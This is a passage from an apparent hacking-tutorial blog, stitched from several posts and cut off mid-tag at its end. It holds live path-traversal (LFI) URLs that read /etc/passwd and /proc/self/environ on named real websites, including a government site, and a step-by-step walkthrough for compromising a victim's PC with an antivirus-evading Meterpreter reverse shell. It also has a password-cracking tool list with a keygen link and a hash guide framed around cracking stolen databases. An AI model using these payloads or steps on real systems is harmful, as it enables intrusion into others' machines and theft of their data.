2.4<br /> <br /> <b>Download</b><br /> <a href="https://code.google.com/p/fimap/downloads/list">Click Here</a><br /> <br /> <b>Demo Site:</b><br /> Vuln Check1 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd<br /> Vuln Check2 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ<br /> <br /> Exmp 2 := http://www.aladde.org/index.php?load=../../../../../../../../../../../../../../proc/self/environ<br /> <br /> Hope you like this tutorial don't forget to leave your valuable comment thank You :)

Best LFI | RFI Scanner in BackTrack Fimap-Exploitation Tool

Hi everyone this is a one more post on web scanner that is actually best on its Business For LFI (Local File Inclusion) And Remote File Incl...

Read more »

Web Scanner Nikto Tutorial On Kali | Backtrack

Hi everyone as we all know there are numbers of web application scanner present on backtrack os so i will be covering most of the scanner in my upcoming post so today we are going to discuss about a small tool known as Nikto.<br /> <h2><font color="red"><br /> Nikto</font></h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXQgKd98QyzEl5Oi2O14GfaiVkYiXHSsPdbi-10e2CFjGyL7UVgjgWT-N0MJq25o0RmpYWwgOCSS3LLrivT8OUJoApOoaB6i1hvZrZ0gsuBsWS8sd77KHE6lzUf6BVy3tmE8hTxiC0MO1C/s1600/1.png" imageanchor="1" ><img height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXQgKd98QyzEl5Oi2O14GfaiVkYiXHSsPdbi-10e2CFjGyL7UVgjgWT-N0MJq25o0RmpYWwgOCSS3LLrivT8OUJoApOoaB6i1hvZrZ0gsuBsWS8sd77KHE6lzUf6BVy3tmE8hTxiC0MO1C/s800/1.png" width="550" /></a></div>Nikto is basically an open source <b>web server scanner</b> which performs comprehensive tests against web servers for multiple items,including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.<br /> <br /> Nikto is not designed as an overly stealthy tool.its current version is "Nikto 2.1.5"<br /> <br /> <b>Some of its key feature:-</b><br /> <br /> <li>Full HTTP proxy support<br /> <li>Apache user name enumeration<br /> <li>Logging to metasploit<br /> <li>Secure Socket Layer support (SSL)<br /> <li>Subdomain brute forcing (guessing)<br /> <li>Easy to update<br /> <li>Save report on multiple format<br /> <br /> <b><br /> How to use Nikto for scanning web app ?</b><br /> <br /> The usage of this tool is very simple,but before doing these scanning you just need to update it.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0D5EexEuEZ5T1YyPpjwyuQ2aA14cTl-5TKBAI6kA1NZ8o7y4AfZv_JDm6wQOCABfi9OQDS6bOCCWCfMu1GXaM0OQ-5u6ob89b_zx76qSff0jAwX2-qr-zqFw7Tue4YmLku0-DsgYQUazJ/s1600/2.png" ><img height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0D5EexEuEZ5T1YyPpjwyuQ2aA14cTl-5TKBAI6kA1NZ8o7y4AfZv_JDm6wQOCABfi9OQDS6bOCCWCfMu1GXaM0OQ-5u6ob89b_zx76qSff0jAwX2-qr-zqFw7Tue4YmLku0-DsgYQUazJ/s700/2.png" width="550" /></a></div><br /> Command in backtrack<br /> <font color="green"><br /> <b>#./nikto.pl -update (on current directory cd/pentest/web/nikto)</b><br /> </font><br /> In kali it is.<br /> <font color="green"><br /> <b>#nikto -update</b><br /> </font><br /> To run a basic scan you just need to type.<br /> <font color="green"><br /> <b>#nikto -h [ip/target address]<br /> #./nokto -h [ip/host address](in backtrack)</b><br /> </font><br /> If you want to check different port than use<br /> <font color="green"><br /> <b>#nikto -h [target host] -p [port number]</b><br /> </font><br /> If you want this test via proxy than you can use by this command<br /> <font color="green"><br /> <b>#nikto.pl -h [target host] -useproxy http://localhost:8080/</b><br /> </font><br /> For help and know more options available just use.<br /> <font color="green"><br /> <b>#nikto -H</b><br /> </font><br /> i hope this tut will help you to use nikto scanner if any more doubt please do comment :).<br /> <br /> <a href="http://cirt.net/nikto2">Thank you for reading</a>.

Web Scanner Nikto Tutorial On Kali | Backtrack

Hi everyone as we all know there are numbers of web application scanner present on backtrack os so i will be covering most of the scanner in...

Read more »

How to find all hidden sub domain name of a website | Domain name

hello every one this is a small post where i will discuss finding sub domain name of a target website.<br /> So what exactly subdomain name ..its basically a name that s attached to beginning of a domain name like.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkqIM3MitV3Gfye4W33OB2ZS5gXBC6Y4bIDdGlQh-D9qRYG5RHlqoBu8wEEAE5a2i9bXLwL8otirRgLH5iunODRlEsAIefILUX1V_cXZ6ts0uHGtSUqxrSDVb3vgeduq5WvGobteksVxyU/s1600/subdomains.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkqIM3MitV3Gfye4W33OB2ZS5gXBC6Y4bIDdGlQh-D9qRYG5RHlqoBu8wEEAE5a2i9bXLwL8otirRgLH5iunODRlEsAIefILUX1V_cXZ6ts0uHGtSUqxrSDVb3vgeduq5WvGobteksVxyU/s1600/subdomains.jpg" /></a></div><br /> abc.xyz.com<br /> xxx.xyz.com<br /> 123-xs.xyz.com<br /> <br /> Domain name owner usually create such subdomain name in order to create one more side of there Business requirements. <br /> so as we know some domain name are publicly available but there also some priv8 /hidden domain name that also exist which the owner of domain name might use for internal purpose.<br /> <br /> so how we can find those hidden sub domain name so here are some ways by which you can easily find the sub domain name of a website.<br /> <br /> <li>Using google<br /> <br /> you can simply use a simple google search like.<br /> <br /> *.xyz.com <br /> <br /> which will list all possible subdomain name indexed by google.com.<br /> <br /> <ul>Demo.</ul><br /> *.darksite.co.in<br /> <br /> <br /> <li>Using Online site<br /> <br /> There are various website which are available for finding possible domain of a website but one of them is .<br /> <br /> <a href="http://www.wolframalpha.com/">Wolframalpha</a> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgUckRzwv9GlBFeGYAu3zLFZi-D7kaNx_l6FzDx9N0ynjKAfrEdYh5BcM3UTvMi5dtYKbX3WhwjanVmp539MRA2Sf28K41fJ5K6x7qi6168cR2QzP8BvCACDTewPeA8J-FTGGZUNMpNLYJ/s1600/Search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgUckRzwv9GlBFeGYAu3zLFZi-D7kaNx_l6FzDx9N0ynjKAfrEdYh5BcM3UTvMi5dtYKbX3WhwjanVmp539MRA2Sf28K41fJ5K6x7qi6168cR2QzP8BvCACDTewPeA8J-FTGGZUNMpNLYJ/s320/Search.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjdB3X3zLQ5_wyf3NearC3KCK_DJlRI14Pl6ShDsZpLh6ydzxsn0ELvNMOL_quarKVFZ6pUCuUoCZDFvyN-g5sslRqpkRTYFH7lbeK0RmsFQ9sXaHGdZQnoBHdJbMwKjrmobUk0G-lQ5JQ/s1600/Search_Result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjdB3X3zLQ5_wyf3NearC3KCK_DJlRI14Pl6ShDsZpLh6ydzxsn0ELvNMOL_quarKVFZ6pUCuUoCZDFvyN-g5sslRqpkRTYFH7lbeK0RmsFQ9sXaHGdZQnoBHdJbMwKjrmobUk0G-lQ5JQ/s320/Search_Result.png" /></a></div><br /> it just list you all possible domain using their DNS analysis.<br /> <br /> <b>So is it important to find subdomain name of a website for hackers ? </b><br /> <br /> The answer is very simple .sub domain name usually helps hackers to find the vulnerable url and exploit it. few months back one pakistani guy Rafay Baloch got 5,000$ for finding a sub domain name of paypal and he just guessed the password to be "<b>root</b>".so do find some hidden sub domain and all the best :) .<br /> <br />

How to find all hidden sub domain name of a website | Domain name

hello every one this is a small post where i will discuss finding sub domain name of a target website. So what exactly subdomain name ..its...

Read more »

Secure your Smart Phone ! Don't Let Your Smart Phone Be the next

Hi everyone after a long day here is one of my post on mobile security ...as the dayz progressing people are getting much friendly with doing things from their cell phone now every task is simulated into app and merged into smart phone now.starting from ticket booking ,banking transaction,online purchasing and selling ...many we are depending on our smart phone only.so as you know humans are weakest link of security you should observe following few tips to stay protected against these mobile phone based attack(Smart phone base attack as it is emerging day by day )<br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKCPUuROQS77Cu4SJJMHnTWd8Yr4h_kz1hjVNk-0Uu7aRMcUHEKucKxyeysCa_4HQC2_dtSDRtg-VuMsBx43lgjXHv7WCfZj1gJFXVatzb8NAGiSZXAXZ7twomMUmOl1cTdTHMwzuVcONc/s1600/darksite.png" imageanchor="1" ><img alt="smart phone hacking" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKCPUuROQS77Cu4SJJMHnTWd8Yr4h_kz1hjVNk-0Uu7aRMcUHEKucKxyeysCa_4HQC2_dtSDRtg-VuMsBx43lgjXHv7WCfZj1gJFXVatzb8NAGiSZXAXZ7twomMUmOl1cTdTHMwzuVcONc/s1600/darksite.png" width="560" /></a><br /> Golden Tips to stay safe using Smart Phone<br /> <li>Always use lock (complicated Pattern is best)..you never know where your phone travel and reveal.<br /> <li>don't connect your smart phone to un-trusted Network (Thinking lets enjoy free internet)<br /> <li>Don't install app without verification.<br /> <li>don't disable data protection option that is there in your phone...<br /> <li>there are many key logger program available for smart device which can actually store all your key touched and logs and send to attacker so be safe on that.<br /> <li>always better to have install a security program /app.<br /> <br /> There are many such tips available which i will be updating if you know such feel free to comment.

Secure your Smart Phone ! Don't Let Your Smart Phone Be the next

Hi everyone after a long day here is one of my post on mobile security ...as the dayz progressing people are getting much friendly with doin...

Read more »

Hack Remote Pc Using ShellCodeExec In Social Engineering Tool Kit | By Passing Antivirus

HI every one today i am going to explain you ho you can hack remote pc using social engineering tool kit present in backtrack.<br /> so lets do it mostly i will show you rather than putting lots theory stuff. and this is the quick way to learn it and don't forget to practice so follow these step by step.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBFlaVTtGnwyLn4P5fiJQHXGJR-mkKLz4VHkG2ZA_TqtMXSa2eiwormrPZ8wZPFBXRYT10GmlIQ6Ym-D2w-ml0eWhmcbjJUPx5lxw-WElECL0-XYq6RMhO9yp_s8ial8_8scnvqbjuGUJ1/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBFlaVTtGnwyLn4P5fiJQHXGJR-mkKLz4VHkG2ZA_TqtMXSa2eiwormrPZ8wZPFBXRYT10GmlIQ6Ym-D2w-ml0eWhmcbjJUPx5lxw-WElECL0-XYq6RMhO9yp_s8ial8_8scnvqbjuGUJ1/s320/1.png" /></a></div>Now after opening social engineering tool kit press 1.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2ZQDOdfdiHvXoi-JKFTAJtnNFWUk0azwMMKX4WNuKPyRvi9A2NEthpCVGxIJjh5ARJCM4sj6YpVA6Jn538jUWd-F5pTiJj8SK-rWWnWMIUTQSEH8wpQ-hLSkZVOuv9o5BMln9lG0xIsLP/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2ZQDOdfdiHvXoi-JKFTAJtnNFWUk0azwMMKX4WNuKPyRvi9A2NEthpCVGxIJjh5ARJCM4sj6YpVA6Jn538jUWd-F5pTiJj8SK-rWWnWMIUTQSEH8wpQ-hLSkZVOuv9o5BMln9lG0xIsLP/s320/2.png" /></a></div>Next select option 2<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4F1TKHNxvDCM4hY-Hce_UXZtdVhWpyVc0p1XP851zAGpe4s192jRIWuMbV-4lD3cJTAhaaL_qI8UVx3F0Sg4HszZZsvNOVrYKxOE1VoU1f5BQodAtB8iuJ13pMa4A-xzb0kNLCc9PVJbK/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4F1TKHNxvDCM4hY-Hce_UXZtdVhWpyVc0p1XP851zAGpe4s192jRIWuMbV-4lD3cJTAhaaL_qI8UVx3F0Sg4HszZZsvNOVrYKxOE1VoU1f5BQodAtB8iuJ13pMa4A-xzb0kNLCc9PVJbK/s320/3.png" /></a></div>Next select option 1<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYMF_oDvxL3r_Dr8c05SV2dBB1ce6-WQfSEM-E7O20hVg3U3HllP0D_u9gbLmsld73G3Y8_q_6WWeeztPVWkLY6DRBLahrGQWQmIqH-sf8UmO5DBtwIg2q_klCAZ-bnUknqMZsCftWhLC/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpYMF_oDvxL3r_Dr8c05SV2dBB1ce6-WQfSEM-E7O20hVg3U3HllP0D_u9gbLmsld73G3Y8_q_6WWeeztPVWkLY6DRBLahrGQWQmIqH-sf8UmO5DBtwIg2q_klCAZ-bnUknqMZsCftWhLC/s320/1.png" /></a></div>After that select 2 and select nat/port forwarding to be no and give your ip address .you can easily know your ip address by<br /> typing ifconfig command and then provide a url which the victim will be redirected after clicking link.just below see image.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuE9qD72wRJd6ZMaNSTysklbtypwXhch-jRChVmxIRI4wlnTyFf2DdeqvBAQaog_yXX-3soVdznrlF_-fGCvbESnPCW6LbLAFZkNs02QZ44d1gNvcgL1iOZa9fsUEmPvBxmJwvLFuNq_Ci/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuE9qD72wRJd6ZMaNSTysklbtypwXhch-jRChVmxIRI4wlnTyFf2DdeqvBAQaog_yXX-3soVdznrlF_-fGCvbESnPCW6LbLAFZkNs02QZ44d1gNvcgL1iOZa9fsUEmPvBxmJwvLFuNq_Ci/s320/2.png" /></a></div>Next come the important stuff select the pay laod to be 14 that is shellcodexec AV Safe. and for port to listen just press enter as it take 443 to be default port.and in the end select the payload to be deliver by shellcodeexec to be 1 that is Windows meterpreter reverse tcp.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBDfGvpmALLyOEq2JuFZKJoyW6WTigVrtFNpovUpqBkEVvqpjtXyNjwpNA-mLz-vhzV2rgvzHyH3svKkpIpCWwZnZSIwcj0KRhd3n88BlcPhcB9XXkZ40SQUujwdXIE6l9HL808XHzcFyw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBDfGvpmALLyOEq2JuFZKJoyW6WTigVrtFNpovUpqBkEVvqpjtXyNjwpNA-mLz-vhzV2rgvzHyH3svKkpIpCWwZnZSIwcj0KRhd3n88BlcPhcB9XXkZ40SQUujwdXIE6l9HL808XHzcFyw/s320/4.png" /></a></div>Now wait for some time finally it will show server started and finally send the url to victim and victim open it <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Asb8UaOeGwK55yjndby1T-iTROk3PYzAKEQqxjNX0D_M2nnYvg7DdRZp_10VzM1H7VyWUSjBG-M7ziYV150U1Wd6BvRIa0mnJAn2ltoY_HqSNcpI8pm-seIVya_64D0Oitnq0COGnal6/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Asb8UaOeGwK55yjndby1T-iTROk3PYzAKEQqxjNX0D_M2nnYvg7DdRZp_10VzM1H7VyWUSjBG-M7ziYV150U1Wd6BvRIa0mnJAn2ltoY_HqSNcpI8pm-seIVya_64D0Oitnq0COGnal6/s320/9.png" /></a></div>he/she will be redirected to google page and now lets check in backtrack whether session created or not?<br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgyIz88o0BtkQ7j5PxsmC_79GsY9w0tm_-MiZLEu4Jip3rdUjrF27c1REfcmquU-Pzhrcg_VLWFBmg6s6yyfR6omOePp98yOh-eiCnKnyfRLQWd-ROR1o0_dR7FMQ9fouBNPG16RwZOUu/s1600/11.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgyIz88o0BtkQ7j5PxsmC_79GsY9w0tm_-MiZLEu4Jip3rdUjrF27c1REfcmquU-Pzhrcg_VLWFBmg6s6yyfR6omOePp98yOh-eiCnKnyfRLQWd-ROR1o0_dR7FMQ9fouBNPG16RwZOUu/s320/11.png" /></a><br /> now we have access to remote pc ,with the help of <a href="http://www.darksite.co.in/2012/05/metaspolit-for-penetration-test_03.html">meterpreter command</a> we do what ever we want.<br /> Hav a nice hack enjoy at any step any doubt do comment below we are always love to answer.<br /> Thanks :).

Hack Remote Pc Using ShellCodeExec In Social Engineering Tool Kit | By Passing Antivirus

HI every one today i am going to explain you ho you can hack remote pc using social engineering tool kit present in backtrack. so lets do i...

Read more »

Hackers Favorite Tools For Cracking Password

<div dir="ltr" style="text-align: left;" trbidi="on">SoHi In my Previous i posted about<a href="http://www.darksite.co.in/2013/09/commonly-found-encrypted-password-hash.html"> COMMONLY FOUND ENCRYPTED PASSWORD HASH AND SALTS</a>Now we Will discuss what tools are used for cracking those password so lets begin the cracking .<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg6qrZ8Y1M6xNy7PxUpR-ePKj5KTUhqlwfgc2DmH_ip2BHSSRG0dHcboEG9KSsdJm9Im-D2WvoHqNh7DkZ4uv83a9FfMVtiBFbiRwuSVSrlDopTU-gZr35pk0PMzRhH9XOSi3j4WSJaI0U/s1600/large.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hacker's Favorite Tools For Password Cracking" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg6qrZ8Y1M6xNy7PxUpR-ePKj5KTUhqlwfgc2DmH_ip2BHSSRG0dHcboEG9KSsdJm9Im-D2WvoHqNh7DkZ4uv83a9FfMVtiBFbiRwuSVSrlDopTU-gZr35pk0PMzRhH9XOSi3j4WSJaI0U/s1600/large.jpg" /></a></div><br /> Cain and Abel :- Best tool for windows password cracking.It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. <br /> <br /> <a href="http://www.hackingtools.in/free-download-cain-and-abel/">Download Free</a> <br /> <br /> John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.<br /> <br /> <a href="http://www.openwall.com/john/">Download Free</a> <br /> <br /> THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.<br /> <a href="http://freeworld.thc.org/thc-hydra/"><br /> Download Free</a><br /> <br /> L0phtcrack :- Windows password auditing and recovery application L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc).<br /> <br /> <a href="http://download.insecure.org/stf/lc5-setup.exe">Download</a><br /> <a href="http://download.insecure.org/stf/lc5-crack.zip">http://download.insecure.org/stf/lc5-crack.zip</a> (keygen) <br /> <br /> Pwdump :- Windows password recovery tool. Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.<br /> <br /> <a href="http://swamp.foofus.net/fizzgig/pwdump/downloads.htm">Download Free</a><br /> <br /> RainbowCrack :- An Innovative Password Hash Cracker.The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. <br /> <a href="http://www.antsight.com/zsl/rainbowcrack/"><br /> Download Free</a><br /> <br /> Brutus :- A network brute-force authentication cracker<br /> This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.<br /> <a href="http://www.hoobie.net/brutus/brutus-download.html">Download Free</a><br /> <br /> Please Do comment if you know any other tools that you use to break any password you can also share online url .<br /> <br /> thank you for your love and support :).</div>

Hackers Favorite Tools For Cracking Password

SoHi In my Previous i posted about COMMONLY FOUND ENCRYPTED PASSWORD HASH AND SALTS Now we Will discuss what tools are used for cracking th...

Read more »

Commonly Found Encrypted Password Hash And Salts

This post basically gives you a real life idea of few commonly found encrypted .so let me make you understand why this encryption is needed for the website developer? the answer is very simple its basically to make storage of your in secured format rather than storing password in clear text format it is always better to store keep it encrypted format so that nobody can easily see it<br /> to have better idea lets discuss.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8uu5BBjJEXkuwtVBlN5LHYvaCqLInfNKeRi1r3pS2t2MqS1nf-RYcciCDyC5iy4O1Ork2AFfZWA6MW7veiI9TXVUEpqsB-tQTzl6hE1aWDPKCt0C0-dCfwV0GZ58QyeGlSnv0Dfs6ST4K/s1600/encryption.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8uu5BBjJEXkuwtVBlN5LHYvaCqLInfNKeRi1r3pS2t2MqS1nf-RYcciCDyC5iy4O1Ork2AFfZWA6MW7veiI9TXVUEpqsB-tQTzl6hE1aWDPKCt0C0-dCfwV0GZ58QyeGlSnv0Dfs6ST4K/s320/encryption.png" /></a></div><font color="red"><h3>What is Hash? Types Of HASH</h3></font><br /> It is a common technique use by developer to store password in database in encrypted format so that normal person cannot see the credentials in clear text.every time when ever a user log in to authentication portal his/her password is compared with the stored hash and if it found to be valid then the user is given access to portal,if the two hashes are not the same the passwords do not match and the user is denied access.<br /> <br /> <h2>various types of encrypted password with example </h2><br /> <li><b>MD5 </b>- The most common hash you will come across in the wild is an MD5 hash (Message-Digest algorithm)<br /> <br /> Characteristics:- <br /> <br /> <li>They are always 32 characters in length (128 Bits)<br /> <li>They are always hexadecimal (Only use characters 0-9 and A-F)<br /> <blockquote>Example - f5d1278e8109edd94e1e4197e04873b9<br /> </blockquote>If the hash breaks one of these rules - IT IS NOT MD5.<br /> <br /> <li><b>SHA1</b> - Still used frequently on the internet and is one of a large family of Secure Hash Algorithms.<br /> <br /> Characteristics:- <br /> <br /> <li>They are always 40 Characters in length (160 bits)<br /> <li>They are always hexadecimal (Only use characters 0-9 and A-F)<br /> <blockquote>Example - ab4d8d2a5f480a137067da17100271cd176607a1<br /> </blockquote>If the hash breaks one of these rules - IT IS NOT SHA1.<br /> <br /> <li><b>MySQL < 4.1 </b>- These aren't used very often but still come up on very often because people have no idea what to do with them, they are used in older versions of Mysql.<br /> <br /> Characteristics:- <br /> <br /> They are always 16 Characters in length (64 bits)<br /> They are always hexadecimal (Only use characters 0-9 and A-F)<br /> If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1. <blockquote><br /> Example - 606727496645bcba<br /> </blockquote><br /> <li><b>MYSQL5</b> - Used in newer versions of MYSQL to store database user passwords.<br /> <br /> Characteristics:- <br /> <br /> They are always 41 characters in length<br /> They are always capitalized<br /> They always begin with an asterisk <br /> If the hash breaks one of these rules - IT IS NOT MYSQL5.<br /> <blockquote>Example - *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75<br /> </blockquote><br /> <li><b>MD5(Wordpress)</b> - Used in word press driven sites, one of the most commonly confused hashes by everyone<br /> <br /> Characteristics:- <br /> <br /> They always start with $P$<br /> They are always variable case alpha numeric (0-9 A-Z a-z)<br /> The are always 34 characters long<br /> <br /> If the hash breaks one of these rules - IT IS NOT MD5(Wordpress).<br /> <blockquote>Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1<br /> </blockquote><li><b>MD5(phpBB3)</b> - Used in PHPBB forums, another commonly miss identified hash, especially amongst skids.<br /> <br /> Characteristics:- <br /> <br /> They always start with $H$<br /> They are always variable case alpha numeric (0-9 A-Z a-z)<br /> The are always 34 characters long<br /> If the hash breaks one of these rules - IT IS NOT MD5(PhpBB).<br /> <br /> <blockquote>Example - $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0<br /> </blockquote><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_DC6Pb3C7lTWq9mgBLwWrfv8-0BN9Fd4zQn65g4ty5BdM0Bz_a6FCmDfMeXbV5ASdKA69uo9lyAyee22UoXJl4IR68ikNmbvZ3QkIb8rHoXzwu_UcAv_ZNwtz_-cSw0pUpKZMR2z5CjH/s1600/encryption.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_DC6Pb3C7lTWq9mgBLwWrfv8-0BN9Fd4zQn65g4ty5BdM0Bz_a6FCmDfMeXbV5ASdKA69uo9lyAyee22UoXJl4IR68ikNmbvZ3QkIb8rHoXzwu_UcAv_ZNwtz_-cSw0pUpKZMR2z5CjH/s320/encryption.jpg" /></a></div><font color="red"><h3>What is SALTS? Types of Salts</h3></font><br /> The most commonly salted hash is MD5 because it is cryptographically weak and easy to crack. So a salt gets added to the password before hashing to increase the parity. For example MD5($password.$salt).<br /> <br /> <li><b>Salted MD5 </b>- Used in a large amount of applications to increase hash parity and to increase the time it takes to crack.<br /> <br /> Characteristics:- <br /> <br /> They consist of two blocks connected by a colon, the first is the hash the second is the salt.<br /> The first part of the salted hash is hexadecimal, the second is variable case alphanumeric.<br /> They first part will always be 32 characters long<br /> The second part can be any length.<br /> If the hash breaks one of these rules - IT IS NOT A SALTED MD5.<br /> <blockquote>Example - 49adee90123f8c77d9020bba968c34dd:PS2en<br /> </blockquote>Warning - in some cases the salt can contain symbols (but this is rare)<br /> <br /> <b>NOTE - </b>You need both the salt AND the hash to decrypt a salted md5.<br /> <br /> <b>Cracking these Encryption</b><br /> <br /> This what a hacker always look for after getting the password from database through sql injection /other web vulnerability.<br /> There are various online as well as offline tools are available for cracking any encrypted password so that i will put in my next post keep visiting have a racking time ahead :).

Commonly Found Encrypted Password Hash And Salts

This post basically gives you a real life idea of few commonly found encrypted .so let me make you understand why this encryption is needed ...

Read more »

Xenotix XSS Exploit Framework V4 A Perfect Tool For Xss Exploiting | Advance XSS Detecting Frame work

Hi everyone today i am going give you a brief explanation on Xenotix Tool It is a tool specially crafted for detecting XSS And Exploiting the Attack.<br /> It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident[IE], WebKit[Mozilla], and Gecko[Chrome]) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. XSS is one of the top 3rd Vulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgki4mU6qeYSHy9OWNeZkjHHhXeyc-YnQ8lk517XcyQWLiERZqn2hWy5KHdoWTuygXpAgsb-J3n4z5mdyZeOkEY1QpFrqgQyUu0d4cKT2qSAo0mPqwYSAAnDHXc4rZuNhTJGpJUS1FdVTht/s1600/xenotix+Xss+Exploration.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="xenotix" 